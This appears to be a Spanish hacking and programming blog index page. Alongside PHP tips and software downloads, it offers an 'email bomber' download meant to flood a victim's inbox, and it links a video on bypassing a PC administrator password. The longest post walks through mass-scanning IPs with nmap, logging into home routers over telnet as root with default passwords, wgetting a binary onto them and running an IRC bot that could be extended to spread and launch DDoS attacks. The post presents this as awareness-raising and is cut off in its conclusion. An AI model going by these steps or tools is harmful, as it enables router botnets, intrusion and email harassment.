Bombardero de correos BOMB THEM

<div style="text-align: center;">Este es un bombare de correo funcional solo meten el correo de la victima y a bombardear se ha dicho envia 999 mensajes por segundo<br /><br /><a href="http://kimeras.ok.pe/" target="_blank"><img alt="Image and video hosting by TinyPic" border="0" src="http://i38.tinypic.com/b7jiix.jpg" /></a><br /></div><br /><br /><div style="text-align: center;"><a href="http://kimeras.ok.pe/" target="_blank"><img alt="Image and video hosting by TinyPic" border="0" src="http://i38.tinypic.com/2n18al1.jpg" style="width: 471px; height: 569px;" /></a><br /></div><br /><br /><div style="text-align: center;"><a href="http://kimeras.ok.pe/" target="_blank"><img alt="Image and video hosting by TinyPic" border="0" src="http://i36.tinypic.com/2ziy9ax.jpg" style="width: 517px; height: 443px;" /></a><br /></div><br /><br /><div style="text-align: center;"><a href="http://kimeras.ok.pe/" target="_blank"><img alt="Image and video hosting by TinyPic" border="0" src="http://i38.tinypic.com/dqry2t.jpg" style="width: 476px; height: 213px;" /></a><br /></div><br /><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-family:verdana,sans-serif;"><span class="Apple-style-span" style="line-height: 16px;font-size:small;" ><b><span class="Apple-style-span" style="font-weight: normal; line-height: 22px; color: rgb(255, 255, 255);font-family:arial;font-size:14px;" ><a href="http://www.box.net/shared/vylk8ivnpf" style="color: rgb(221, 221, 221); text-decoration: underline;" target="_blank"><img alt="" border="0" onload="NcodeImageResizer.createOn(this);" src="http://chikago.es/Descargar/descarg133.gif" style="border: 1px solid rgb(179, 118, 89); padding: 1px;" /></a></span></b></span></span></div>

Bombardero de correos BOMB THEM

Este es un bombare de correo funcional solo meten el correo de la victima y a bombardear se ha dicho envia 999 mensajes por segundo

Leer más »

¿Como filtrar información que llega desde un formulario con PHP?

<p>Esta entrada sólo es para presumir un poco de mis ideas locas para el filtrado de datos que llegan desde algún formulario.</p> <p>Lo que hago es obtener todos los campos mediante un arreglo donde especifico cada unos de los campos que deberán o deberían estar ahí, y después los dejo listos para ser filtrados o guardados.</p>

¿Como filtrar información que llega desde un formulario con PHP?

Esta entrada sólo es para presumir un poco de mis ideas locas para el filtrado de datos que llegan desde algún formulario. Lo que hago e...

Leer más »

Generando IFs con PHP

<div class="post_txt"><br />De verdad que nunca creí llegar a tanto, pero la necesidad de verdad me hizo<br />enloquecer. Aclaro que esto es también para presumir y por favor dejen<br />críticas constructivas, <strong>no hago diagramas de flujo a nadie</strong><br />:D (<del>vale la pena seguir leyendo</del> léanlo si quieren o al menos<br />pasen a compadecer mi status de locura momentaneo en los comments :P )<p>Lo<br />que busco con todo esto que les mostraré, es crear una lista de IF's en la<br />que sólo verifico que cierta variable exista y además contenga algún valor<br />tratando de evitar Warnings al usar variables no declaradas aún, y de ahí un<br />2do paso que no les mostraré en el cual dentro de un procedimiento genero<br />chorrocientas mil combinaciones de INNER JOIN's y WHERE's en consultas SQL.<br />:S</p><p>Si tuviéramos una aplicación en PHP en la que hacemos listado de<br />registros, y en la que intentamos filtrar a su ves por alguna serie de<br />parámetros que le enviemos (por ejemplo en el caso de wordpress el usa algo<br />como <strong>isCategory()</strong>, <strong>isDate()</strong>, <strong><br />isPost()</strong>, <strong>isSearch</strong> o cosas así)... Si tuviéramos<br />por ejemplo (como en mi caso algo así):</p><ol><br /> <li>isSearch()</li><br /> <li>isType()</li><br /> <li>isCategory()</li><br /> <li>isDate()</li><br /> <li>isOption1()</li><br /> <li>isOption2()</li><br /> <li>isOptionEtc()</li><br /></ol> <p>Tendríamos que hacer tantas validaciones como <strong>funciones tenemos,<br />menos 1</strong>: <em>(2^7)=128</em> ¡¡¡128 combinaciones O_O!!! ¿Y si el<br />cliente cambia de opinión y ahora quita o agrega una posibilidad? neeel...<br />Ni loco escribo eso a pata!! safo! :P ... Y sin intensión de asustar a<br />alguien, si así como están las cosas a alguien se le ocurre agregar tan solo<br />una opción, como resultado esta cantidad crecería exponencialmente ufffff!!!<br /></p> <p>Algo así como esto en términos humanos es lo que necesito hacer:</p> <pre class="hiliter">Sea isSearch() = <strong>TRUE</strong> y todas las demas <strong>FALSE</strong>.<br /><br />Sea isType() = <strong>TRUE</strong> y todas las demas <strong>FALSE</strong>.<br /><br />Sea isCategory() = <strong>TRUE</strong> y todas las demas <strong>FALSE</strong>.<br /><br />...<br /><br />Sea isOptionEtc() = <strong>TRUE</strong> y todas las demas <strong>FALSE</strong>.<br /><br />...</pre><div style="text-align: center;"><span class="Apple-style-span" style="font-family:verdana,sans-serif;"><span class="Apple-style-span" style="line-height: 16px;font-size:small;" ><b><span class="Apple-style-span" style="font-weight: normal; line-height: 22px; color: rgb(255, 255, 255);font-family:arial;font-size:14px;" ><a href="http://www.box.net/shared/qafsgj6euh" style="color: rgb(221, 221, 221); text-decoration: underline;" target="_blank"><img alt="" border="0" onload="NcodeImageResizer.createOn(this);" src="http://chikago.es/Descargar/descarg133.gif" style="border: 1px solid rgb(179, 118, 89); padding: 1px;" /></a></span></b></span></span></div></div>

Generando IFs con PHP

De verdad que nunca creí llegar a tanto, pero la necesidad de verdad me hizo enloquecer. Aclaro que esto es también para presumir y por favo...

Leer más »

Sencillo Diagrama de Flujo que representa una visita a al restaurante

<p>Estoy seguro de que a los lectores de este sitio les vendrá bien recordar un poco de sus años de bachillerato con este bonito diagrama que representa graficamente y de manera muy básica la entrada a un restaurant, hecho de rápido, y utilizando <a href="http://www.gliffy.com/">gliffy</a> :)</p> <p>El procedimiento es el siguiente:</p>

Sencillo Diagrama de Flujo que representa una visita a al restaurante

Estoy seguro de que a los lectores de este sitio les vendrá bien recordar un poco de sus años de bachillerato con este bonito diagrama que r...

Leer más »

Exportar registros a Excel automáticamente con PHP

<p>Últimamente he trabajado con aplicaciones de registro de usuarios para distintos eventos, y una de las funcionalidades principales que requieren estos sistemas es la exportación en formato XLS (o de Excel) de toda la información, por lo que en este post les explicaré el procedimiento que utilizo para crear estos listados en formato excel.</p>

Exportar registros a Excel automáticamente con PHP

Últimamente he trabajado con aplicaciones de registro de usuarios para distintos eventos, y una de las funcionalidades principales que requi...

Leer más »

Exportar registros a Excel automáticamente con PHP

<p>Últimamente he trabajado con aplicaciones de registro de usuarios para distintos eventos, y una de las funcionalidades principales que requieren estos sistemas es la exportación en formato XLS (o de Excel) de toda la información, por lo que en este post les explicaré el procedimiento que utilizo para crear estos listados en formato excel.</p>

Exportar registros a Excel automáticamente con PHP

Últimamente he trabajado con aplicaciones de registro de usuarios para distintos eventos, y una de las funcionalidades principales que requi...

Leer más »

Crear archivos ZIP comprimidos con PHP y ZLIB, al vuelo

<p>Crear archivos comprimidos, es otra de las tareas que vienen casi por seguro cuando se trabaja con enormes cantidades de registros y se desea exportar en archivos portables.</p> <p>En este post mostraré el procedimiento que sigo para crear archivos comprimidos con Gzip, y una pequeña explicación de la clase que utilizo y sus razones:</p>

Crear archivos ZIP comprimidos con PHP y ZLIB, al vuelo

Crear archivos comprimidos, es otra de las tareas que vienen casi por seguro cuando se trabaja con enormes cantidades de registros y se dese...

Leer más »

Crear archivos ZIP comprimidos con PHP y ZLIB, al vuelo

<p>Crear archivos comprimidos, es otra de las tareas que vienen casi por seguro cuando se trabaja con enormes cantidades de registros y se desea exportar en archivos portables.</p> <p>En este post mostraré el procedimiento que sigo para crear archivos comprimidos con Gzip, y una pequeña explicación de la clase que utilizo y sus razones:</p>

Crear archivos ZIP comprimidos con PHP y ZLIB, al vuelo

Crear archivos comprimidos, es otra de las tareas que vienen casi por seguro cuando se trabaja con enormes cantidades de registros y se dese...

Leer más »

Adulterando La imagen

<p>Gente, pues aqui les ando dejando otro tutorial sencillo muy facil,<br />el cual nos servira para censurar una imagen osea tabarla de tal forma que no pueda verse el rostro o alguna otra parte, y para que se vea mas profecional no como cuando tapamos la cara con paint xD, esto es con photoshop.</p> <p>Lo primero que debemos hacer obviamente es abrir el adobe photoshop,<br />Seleccionar la imagen que queremos,<br />en este caso yo usare esta imagen el cual llamaremos <strong>EL CERDO</strong> xD</p> <p style="text-align: center;"><a class="thickbox" href="http://i44.tinypic.com/2a8q0bk.jpg"><img alt="" id="imgElement" src="http://i44.tinypic.com/2a8q0bk.jpg" title="Click for a larger view" /></a></p> <p>Una vez seleccionada nuestra imagen pasamos a seleccionar la parte que queremos censurar, para esto utilizaremos la herramienta de “marco eliptico”</p> <p style="text-align: center;"><a class="thickbox" href="http://i41.tinypic.com/14jnp7b.jpg"><img alt="" height="257" id="imgElement" src="http://i41.tinypic.com/14jnp7b.jpg" title="Click for a larger view" width="122" /></a></p> <p>Una vez selecionada la herremienta la colocaremos en la parte de la imagen que vamos a censurar, en este caso yo usare el rostro de EL CERDO</p> <p style="text-align: center;"><a class="thickbox" href="http://i39.tinypic.com/o0ruxx.jpg"><img alt="" id="imgElement" src="http://i39.tinypic.com/o0ruxx.jpg" title="Click for a larger view" /></a></p> <p>Ya casi terminamos, ahora vamos al menu <strong>Filtro > Pixelizar > Mosaico</strong></p> <p style="text-align: center;"><a class="thickbox" href="http://i41.tinypic.com/24mexjr.jpg"><img alt="" id="imgElement" src="http://i41.tinypic.com/24mexjr.jpg" style="width: 532px; height: 376px;" title="Click for a larger view" /></a></p> <p>Despues nos aparece un recuadro, en el cual tendremos que asignar algun valor, si quieren pueden usar el valor que mas les guste pero en este caso yo utilizare el 20 y le damos OK</p> <p style="text-align: center;"><a class="thickbox" href="http://i42.tinypic.com/zjj9k7.jpg"><img alt="" id="imgElement" src="http://i42.tinypic.com/zjj9k7.jpg" style="width: 313px; height: 302px;" title="Click for a larger view" /></a></p> <p>Y listo nuestra imagen EL CERDO fue censurada, el resultado final fue este.</p> <div style="text-align: center;" id="imgFrame"><a class="thickbox" href="http://i44.tinypic.com/2ih8f9u.jpg"><img alt="" id="imgElement" src="http://i44.tinypic.com/2ih8f9u.jpg" style="width: 331px; height: 343px;" title="Click for a larger view" /><strong><span style="color: rgb(51, 102, 153);"> </span></strong></a></div> <div>yy buenoooo</div> <div> </div> <div> </div> <div>xD!! Sorry pero no me pude aguantaaaaaaaar! haha<br /><div style="text-align: center;"><a href="http://es.tinypic.com/" target="_blank"><img alt="Image and video hosting by TinyPic" border="0" src="http://i38.tinypic.com/bdp353.jpg" /></a><br /></div><br /></div>

Adulterando La imagen

Gente, pues aqui les ando dejando otro tutorial sencillo muy facil, el cual nos servira para censurar una imagen osea tabarla de tal forma ...

Leer más »

MyPhoneExplorer 1.7.3, Administra Celulares Sony Ericsson

<p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirwUyl8q4c4i0Q0KRgRg8VbBHKSRc6iQ720Kfs6KC8Z-MyuzRgU9KHnVR5_hM6QPrLZ-EaL7SPknYljB0wA0AZturLLjQUc5zVD37cxRdRMUliMFjHo0ZBijikhkS7SBnENNsblA6FkMg/s1600-h/mpe-02.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5353957506241707618" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirwUyl8q4c4i0Q0KRgRg8VbBHKSRc6iQ720Kfs6KC8Z-MyuzRgU9KHnVR5_hM6QPrLZ-EaL7SPknYljB0wA0AZturLLjQUc5zVD37cxRdRMUliMFjHo0ZBijikhkS7SBnENNsblA6FkMg/s400/mpe-02.jpg" style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;" /></a><br /></p><div style="text-align: justify;">Conectar el teléfono mediante cable, infrarrojos o bluetooth y se sorprenderá de lo fácil y eficiente que puede ser administrar el teléfono con este software compacto. Desde su primera aparición <span style="font-weight: bold;">MyPhoneExplorer</span> se a convertido en la más popular herramienta gratuita para la SE-teléfonos y es constantemente ampliado con nuevas funciones. <span style="font-weight: bold;">MyPhoneExplorer</span> está diseñado para Sony Ericsson K700, K750, K800 - pero funciona con todos los teléfonos Sony Ericsson excepto los teléfonos basados en Symbian (P-series, M600, W950).<br /></div><br /><div style="text-align: justify; font-weight: bold;">Descargar: <a href="http://www.fjsoft.at/files/MyPhoneExplorer_Setup_1.7.3.exe">MyPhoneExplorer 1.7.3</a> (3.01 MB) <a href="http://www.fjsoft.at/en">Sitio Oficial</a></div>

MyPhoneExplorer 1.7.3, Administra Celulares Sony Ericsson

Conectar el teléfono mediante cable, infrarrojos o bluetooth y se sorprenderá de lo fácil y eficiente que puede ser administrar el teléfono ...

Leer más »

MyPhoneExplorer 1.7.3, Administra Celulares Sony Ericsson

<p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirwUyl8q4c4i0Q0KRgRg8VbBHKSRc6iQ720Kfs6KC8Z-MyuzRgU9KHnVR5_hM6QPrLZ-EaL7SPknYljB0wA0AZturLLjQUc5zVD37cxRdRMUliMFjHo0ZBijikhkS7SBnENNsblA6FkMg/s1600-h/mpe-02.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5353957506241707618" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirwUyl8q4c4i0Q0KRgRg8VbBHKSRc6iQ720Kfs6KC8Z-MyuzRgU9KHnVR5_hM6QPrLZ-EaL7SPknYljB0wA0AZturLLjQUc5zVD37cxRdRMUliMFjHo0ZBijikhkS7SBnENNsblA6FkMg/s400/mpe-02.jpg" style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;"></a><br /></p><div style="text-align: justify;">Conectar el teléfono mediante cable, infrarrojos o bluetooth y se sorprenderá de lo fácil y eficiente que puede ser administrar el teléfono con este software compacto. Desde su primera aparición <span style="font-weight: bold;">MyPhoneExplorer</span> se a convertido en la más popular herramienta gratuita para la SE-teléfonos y es constantemente ampliado con nuevas funciones. <span style="font-weight: bold;">MyPhoneExplorer</span> está diseñado para Sony Ericsson K700, K750, K800 - pero funciona con todos los teléfonos Sony Ericsson excepto los teléfonos basados en Symbian (P-series, M600, W950).<br /></div><br /><div style="text-align: justify; font-weight: bold;">Descargar: <a href="http://www.fjsoft.at/files/MyPhoneExplorer_Setup_1.7.3.exe">MyPhoneExplorer 1.7.3</a> (3.01 MB) <a href="http://www.fjsoft.at/en">Sitio Oficial</a></div>

MyPhoneExplorer 1.7.3, Administra Celulares Sony Ericsson

Conectar el teléfono mediante cable, infrarrojos o bluetooth y se sorprenderá de lo fácil y eficiente que puede ser administrar el teléfono ...

Leer más »

Burla a Megavideo , Rapishare, Megapor , Megaupload

<div style="text-align: justify;"><b>Esta práctica extensión para Firefox</b> elimina cualquier limitación impuesta por las plataformas de transferencia de datos tales como <b>Megavideo, Veoh, Megaupload o Rapidshare</b>.<br /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">El propósito de esta herramienta es la de proporcionar al usuario una forma útil de poder ver los vídeos desde esas plataformas sin ninguna restricción de tiempo.<br /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Para ello, según se trate de un servicio u otro el programa actúa de una determinada forma <b>ampliando en algunos casos el captcha </b>y en otros mostrando el contenido en una ventana aparte.<br /></div><br /><b>Estas son las opciones que podemos encontrar en las preferencias de Illimitux:</b><br /><ul><li> Omitir el captcha de Megaupload</li><li> Liberar vídeos automáticamente</li><li> Permitir cuadro de alerta</li><li> Permitir zoom del código en la imagen (Megaupload)</li><li> Liberar automáticamente archivos de Rapidshare</li><li> Abrir el reproductor en una nueva ventana</li><li> Permitir detección de vídeos en otros sitios web (incrustados)</li></ul><div style="text-align: center; font-weight: bold; font-family: courier new; color: rgb(255, 0, 0); font-style: italic;"><span style="font-size:180%;">Descarga Firefox<br /><span style="font-size:100%;"><span style="color: rgb(51, 51, 51); font-weight: normal;">Click en la imagen para descargar</span></span><br /></span></div><div style="text-align: center;"><a href="http://download.mozilla.org/?product=firefox-3.5.5&os=win&lang=es-ES" target="_blank"><img alt="By Kimeras" border="0" src="http://i36.tinypic.com/ei1ac1.jpg" /></a><br /></div><div style="text-align: center; font-family: webdings; font-weight: bold; font-style: italic; color: rgb(255, 0, 0);"><span style="font-size:180%;">Descargar Illimitux<br /></span><span style="font-size:180%;"><span style="font-size:100%;"><span style="color: rgb(51, 51, 51); font-weight: normal;">Click en la imagen para descargar</span></span></span><br /></div><div style="text-align: center;"><a href="https://addons.mozilla.org/es-ES/firefox/downloads/file/67041/illimitux-3.2-fx.xpi?confirmed" target="_blank"><img alt="By Kimeras " border="0" src="http://i33.tinypic.com/noak9l.png" /></a><br />si no se descargar ir a esta direcion:<br /><span style="font-size:100%;"><span style="font-weight: bold;">https://addons.mozilla.org/es-ES/firefox/addon/11037 </span></span><br /><br />esta muy bonito espero que descargen esto muy pronto esta con mas novedades<br /></div>

Burla a Megavideo , Rapishare, Megapor , Megaupload

Esta práctica extensión para Firefox elimina cualquier limitación impuesta por las plataformas de transferencia de datos tales como Megavid...

Leer más »

Como cambiar la contraseña del Administrador de la Pc sin saberla

hola amigos estava por la web buscando una informacion y me parecio interesante esto y espero que uds puedan verlo esta con sus respectivos creditos de scorpiones.tk <br /><br /><br /><br /><p align="center"><object height="344" width="425"><param name="movie" value="http://www.youtube.com/v/UTJIlf_hjx4&hl=en_US&fs=1&"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/UTJIlf_hjx4&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>

Como cambiar la contraseña del Administrador de la Pc sin saberla

hola amigos estava por la web buscando una informacion y me parecio interesante esto y espero que uds puedan verlo esta con sus respectivos ...

Leer más »

Routers, el gran agujero de seguridad doméstica

En este artículo voy a hacer una descripción de cómo llegué a tomar el control absoluto de varios cientos de pequeños equipos conectados a la red de redes, describiré el porqué es una amenaza mundial y vaticinaré que el futuro del hacking irá por este camino. Pero lo más inquietante será que cualquiera con un poco de suerte puede repetir lo mismo que yo hice.<br /><br /><b><span style="color: rgb(255, 128, 0);">Prólogo</span></b><br /><br />Bien, hace algunos años, aquellos que empezábamos con internet contratábamos nuestra linea de 56k con un ruidoso y chirriante modem. Poco después, vino el ADSL, trayendo vertiginosas velocidades de 1mb. Pero en todo esto había una gran amenenaza que las compañías telefónicas no vieron: cualquiera en su casa podía montar un pequeño servidor. Es cierto que las velocidades de subida no podían dar pie a grandes servicios, pero sí eran lo suficientemente grandes como para abrir un puerto a la escucha y poner una shell remota. En cualquier momento, un atacante podría escanear un rango de IPs y cuando detectara cierto puerto abierto era sinónimo de que estaba infectado con el famoso troyano, tomando el control absoluto del ordenador. Era la época del famoso SubSeven.<br /><br /><b><span style="color: rgb(255, 128, 0);">De cómo SubSeven cayó en el olvido</span></b><br /><br />A medida que pasaba el tiempo, al abaratarse los equipos informáticos, los usuarios comenzaron a adquirir más ordenadores. Pero el problema era que con los antiguos modem tan solo se podia conectar uno a internet, y en caso de querer encufar más máquinas a la red, hacía falta un engorroso proceso. Fue entonces cuando la gente comenzó a comprar routers, hubs ethernet que permitían comunicar cuatro o más equipos con el mundo exterior. Esta práctica se popularizó, hasta que las propias compañías proveedoras de servicios proporcionaban equipos híbridos módem-router, que son los que conocemos ahora.<br /><br />Al utilizar un router, los paquetes que llegan de fuera deben decidir el camino a tomar, porque si hay cuatro ordenadores en la red interna peude ser un auténtico lío. Para eso necesita tablas de enrutamiento. Y si uno quiere conectarse a un ordenador, antes tiene que dar cuentas al router, que debe de estar correctamente configurado para que cuando le decimos <i>"router, conéctame con la máquina x en el puerto 80"</i>, este nos lleve efectivamente a la máquina <i>x</i> en el puerto 80. Por defecto, todos los puertos en los routers están desenrutados, por lo que, a menos que se abran manualmente, este aparatito cuadrado hará oídos sordos de cualquier requerimiento de conexión. El SubSeven había muerto.<br /><br /><b><span style="color: rgb(255, 128, 0);">Máquinas de pocas palabras</span></b><br /><br />Los troyanos de conexión directa ya no eran útiles, pero nunca se cierra una puerta sin que se abra una ventana. Para configurar el router, ciertamente, hacía falta una interfaz. Para ello, estos quedaban a la escucha con un servidor HTTP detrás, y cuando un usuario lo requiriera, ya fuese <b>desde la red local o desde el exterior</b>, el aparato te permitía configurarlo correctamente, siempre y cuando supieras el santo y seña. Y he aquí el quid de la cuestión, la contraseña en casi todos los casos era la misma que traía de fábrica. El 90% de los usuarios no la habrían cambiado, tal vez ni siquiera sabría qué coño es eso. Probando cosas como "admin", "root", "password", "1234"... cualquier atacando sin nada mejor que hacer podía tomar control absoluto de tus tablas de erutamiento.<br /><br />Pero claro, siempre habían usuarios avispados, que la cambiaban con presteza. El problema ahora era que los routers domésticos antiguos no te permitían, en el mejor de los casos, exceder los seis carácteres. Así que un atancante un poco más mañoso, con una sencilla herramienta que probase todas las combinaciones, si se le metía en los cojones acababa accediendo a las enrutadas tripas del engendro.<br /><br /><b><span style="color: rgb(255, 128, 0);">Sofisticación VS Seguridad</span></b><br /><br />Internet creció, las páginas se hicieron más pesadas, el streamming de audio y video provocaban auténticos trombos de datos, y es por eso que el bando de ancha creció, y con el la velocidad de acceso del usuario medio. Para manejar tremenda cantidad de datos, los routers tenían que ser más sofisticados, y sus pequeños ordenadores emebebidos más potentes. Los software de configuración cambiaron, y ahora tambien ofrecían configuración por FTP, telnet, SSH, HTTPS y el antiguo HTTP. Todo muy bonito y configurable, pero esto entraña otro riesgo: a más servicios, más puertos abiertos. Y a más puertos, hace falta un sistema más grande y estable. Y a más grande sea el sistema, más código tiene. Y a más código tiene, más bugs posee. Si a esto sumamos que el usuario sigue sin cambiar la contraseña en sus bonitos routers, tenemos el sueño de cualquier piratilla informático.<br /><br /><b><span style="color: rgb(255, 128, 0);">Idea general del ataque</span></b><br /><br />Desde hace unos pocos años, si un router tiene abiertos los puertos 22 o 23 (SSH y telnet), significará que no solo tiene un pequeño interfaz de configuración, si no un pequeño linux embebido. Muchas marcas de routers los tienen. Si nos conseguimos colar como usuario root el sistema se verá seriamente comprometido. Y si una vez estamos dentro como root, subimos e instalamos un programita que a su vez escanee la red en busca de más equipos vulnerables, tendríamos un gusano peligrosísimo. Y no solo eso: ¿porqué no montar un servidor HTTP, FTP o incluso IRC? Las máquinas tienen un pequeño disco duro, y pocos recursos, pero si yo quiero distribuir material ilegal podría se runa buena opción. Además, casi todos los routers cuentan con un servicio de actualización de DNS dinámico, como DynDNS o No-IP. Con una dirección fija, ya tendríamos un server en toda regla.<br /><br />El sueño de todo hacker es obtener root en un servidor. Esto te da control absoluto. Pero si además eres indetectable por parte del usuario (si este deja la contraseña que trae el router por defeto, ¿va a explorar quien puede estar en su sistema?) y por los firewalls y antivirus, estamos ante una utopía.<br /><br /><b><span style="color: rgb(255, 128, 0);">Comenzando el asalto</span></b><br /><br />En este ejemplo, que es totalmente real, no daré detalles como IPs, o rangos de IP's donde se pueden encontrar equipos vulnerables, ni de compañías que instalan este tipo de routers o de países. Eso sería una irresponsabilidad por mi parte, y se aleja del objetivo didáctico de este artículo. Tan solo diré que es bastante común encontrar un router vulnerable.<br /><br />Bien, lo primero es hacerse con las herramientas necesarias. Nuestro objetivo es arbitrario, o sea, que nos da igual quien sea. Por ello vamos a adquirir la último versión del nmap, un gran programa, de su correspondiente web: <a class="posted" href="http://www.insecure.org/" target="_blank">http://www.insecure.org</a>. Una vez lo tenemos, tanto en Windows como en Linux, vamos a escanear el rango de IPs donde puede haber una vulnerabilidad:<br /><br /><div class="codeheader">Código:<br /><br /></div> <textarea name="textarea" rows="2" cols="35">nmap -v -v -T4 -F 0.1.2.*<br />

Esto escanería los 255 hosts de esa IP. Nótese que esta es poco menos que
ficticia.

Tras un ratito escaneando, el nmap nos debería escupir algunos resultados. Yo,
para este ejemplo, me he fijado en este:

Código:

Host dslxxx.xxx.xxx.xxx.xx (xxx.xxx.xxx.130) is up (0.14s latency).<br />Scanned at 2009-xx-xx xx:x4:35 Romance Standard Time for 91s<br />Interesting ports on dslxxx.xxx.xxx.xxx.xx (xxx.xxx.xxx.130):<br />Not shown: 91 closed ports<br />PORT STATE SERVICE<br />21/tcp open ftp<br />22/tcp open ssh<br />23/tcp open telnet<br />25/tcp filtered smtp<br />80/tcp open http<br />135/tcp filtered msrpc<br />139/tcp filtered netbios-ssn<br />445/tcp filtered microsoft-ds<br />1723/tcp filtered pptp<br />

Seguramente se trata de un bonito router con una bonita cantidad de puertos
abiertos: FTP, SSH, telnet y HTTP. Sin perder más tiempo, abro una línea de
comandos (estoy en Windows) y le hago un rápido telnet:
Código:

C:\>telnet xxx.xxx.xxx.130<br />Connecting To xxx.xxx.xxx.130...

BusyBox on localhost login:

¡Bingo! Tenemos un login por telnet. De igual forma podría ser por SSH, pero
bueno, telnet viene a ser los mismo. Veo una palabra clave: "BusyBox". Un rápido
googleo me informa de que es un minilinux para sistemas embebidos. Me pide el
login, y como yo quiero ser "root", pongo root. Entonces me pide la contraseña.
Pruebo varias, como root, admin, 1234, en blanco,
password, pass... tras algunos intentos, lo consigo (no diré la
verdadera):

Código

BusyBox on localhost login: root
Password:
BusyBox v0.61.pre (2006.09.25-12:57+0000) Built-in shell (ash)<br />Enter 'help' for a list of built-in commands.

#

La ostia. A la primera. Estoy como root en un sistema remoto que no actualizan
desde el 25 de septiembre de 2006. Esto debe de ser el paraíso. Hago un par de
comandos para tantear donde estoy metido:

Código
BusyBox v0.61.pre (2006.09.25-12:57+0000) Built-in shell (ash)<br />Enter 'help' for a list of built-in commands.<br /><br /># whoami<br />root<br /># ls<br />bin etc proc usr var.tar<br />dev lib sbin var<br /># help<br />

Built-in commands:
-------------------
        . : bg break builtin cd chdir continue eval exec exit export
        false fc fg hash help jobs kill local pwd read readonly return
        set setvar shift times trap true type ulimit umask unset wait

# busybox
BusyBox v0.61.pre (2006.09.25-12:57+0000) multi-call binary

Usage: busybox [function] [arguments]...
   or: [function] [arguments]...

        BusyBox is a multi-call binary that combines many common Unix
        utilities into a single executable.  Most people will create a
        link to busybox for each function they wish to use, and BusyBox
        will act like whatever it was invoked as.

Currently defined functions:
        [, ash, busybox, cat, chgrp, chmod, chown, cp, cut, dd, df, echo,
        false, free, grep, hostname, id, ifconfig, init, insmod, kill,
        ln, login, ls, lsmod, mkdir, modprobe, mount, mv, passwd, ping,
        ps, pwd, reboot, rm, rmmod, route, sh, sleep, sync, tar, test,
        tftp, touch, true, tty, umount, wget, whoami, yes

#

Como pueden ver, esoy en el directorio / de un sistema Linux como usuario "root".
Vamos a echar un vistazo alrededor:
Código:
# cd proc<br /># ls<br />1 4 avalanche iomem misc sysvipc<br />102 41 bus ioports modules ticfg<br />111 5 cmdline kcore mounts tty<br />1586 6 cpuinfo kmsg mtd tzval<br />1587 676 devices ksyms net uptime<br />1591 7 dma led_mod partitions version<br />2 73 driver loadavg self wlan<br />3 75 execdomains locks slabinfo<br />319 76 filesystems meminfo stat<br />361 98 fs mii_read swaps<br />377 99 interrupts mii_write sys<br />

# cat version
Linux version 2.4.17_mvl21-malta-mips_fp_le (beri@debian) (gcc version 2.95.3 20
010315 (release/MontaVista)) #1 Mon Sep 25 15:52:29 EEST 2006

# cat cpuinfo<br />processor               : 0<br />cpu model               : MIPS 4KEc V4.8<br />BogoMIPS                : 211.35<br />wait instruction        : no<br />microsecond timers      : yes<br />extra interrupt vector  : yes<br />hardware watchpoint     : yes<br />VCED exceptions         : not available<br />VCEI exceptions         : not available<br />#<br />

Con esto obtenemos un poco más de información. La versión del kernel es bastante
antigua (2.4.17), compilada para un procesador MIPS de 4K. ¿Quien necesita más?
¿No es esto suficiente para hacer maldades? Y lo mejor esque ni siquiera
necesito ejecutar un exploit que me permita ser root. Ya lo soy.



Bueno, llegados a este punto, no se puede perder el tiempo. Veo que dispongo del
comando wget:

Código:
# wget<br />BusyBox v0.61.pre (2006.09.25-12:57+0000) multi-call binary<br /><br />Usage: wget [-c|--continue] [-q|--quiet] [-O|--output-document file]<br /> [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] url<br /><br />#

Por lo que podré obtener cositas de internet.
Me voy a disponer a compilar un simple "Hola Mundo". El código sería el
siguiente:

Código:
#include <conio.h><br /><br />int main()<br />{<br /> printf("Hello world.");<br />}

Me voy a mi otro ordenador, donde tengo Linux, e intento compilarlo. Rápidamente
caigo en la cuenta de que necesito un compilador para MIPS. Después de buscar un
poco en google descargo este, ya compilado:

http://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2.
Habrán muchos otros, pero este fue el primero que encontré. Puede que también
les sirva. No entraré en detalles, los compilé y lo subí a un servidor FTP
gratuito. De nuevo en mi router rooteado, hago:
Código:
# cd var/tmp<br /># wget http://xxx.ftpserver.com/hello<br />Set PR mark for socket 0x6 = 239<br />hello 100% |*****************************| 5551 00:00 ETA<br /># chmod +x hello<br /># ./hello<br />Hello world.#<br />

Fue en este momento cuando sentí un cosquilleo en la boca del estómago. Cogí de
internet un ejemplo de bot IRC en C, lo ajusté, corregí un poco el código, lo
compilé, lo subí, lo ejecuté y vi con admiración como se conectaba a mi servidor
IRC desde un lugar remoto del mundo, completamente a mis órdenes. Podría haberle
puesto un comando para que buscase mas equipos vulnerables, con un mini logeador
por telnet a fuerza bruta y otro comando para inicar un básico DDoS. No hice
nada maligno, pero de querer haberlo hecho, ¿quién iba a impedírmelo? Y es más,
de haberlo hecho, ¿quién me iba a descubrir?

Conclusiones

El ejemplo que he descrito se trata de un serio problema de seguridad mundial.
Cualquier atacante malintencionado podría instalar bots IRC para hacer ataques
DDoS, proxies completamente anónimos, servidores de cualquier tipo, etc. Es
cierto que los routers son muy poco potentes, pero el poder dispones de 1000,
2000 o 10000 pequeñas máquinas indetectables, por muy poco potentes que sean, y
por muy poco ancho de banda del que dispongan, son una seria amenaza.

Con este artículo no estoy incitando al crimen, más bien todo lo contrario.
Intento fomentar el uso de claves seguras, y la responsabilidad del ISP de
